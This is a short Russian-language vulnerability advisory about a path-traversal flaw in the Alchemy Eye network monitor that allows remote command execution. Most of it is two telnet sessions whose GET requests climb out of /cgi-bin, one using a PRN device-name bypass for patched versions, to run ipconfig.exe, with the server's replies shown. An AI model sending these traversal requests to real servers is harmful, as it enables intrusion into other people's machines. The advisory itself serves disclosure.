Alchemy Eye — инструмент монитора за сетью для Windows от Alchemy Labs.
Проблема, существующая в Alchemy Eye, позволяет удаленно выполнять команды. Хотя
разработчики и пытались устранить проблему, она все равно существует.

Успешная эксплуатация позволяет нападающим получить доступ к компьютеру.
Даже на пропатченных системах, нападающий может обходить корневой каталог, помещая имя MS DOS устройства перед первым «../».

Пример: 

Версии до 2.6:

$ telnet localhost 80
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
GET /cgi-bin/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 200 OK
Date: Thu, 29 Nov 2001 18:20:00 GMT
Server: Alchemy Eye/2.0.20
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Более поздние версии:

$ telnet localhost 80
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
GET /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe HTTP/1.0

HTTP/1.0 200 OK
Server: Alchemy Eye/3.0.10
MIME-version: 1.0
Content-Type: text/html
Location: /cgi-bin/PRN/../../../../WINNT/system32/ipconfig.exe
Content-Length: 275

Оставить мнение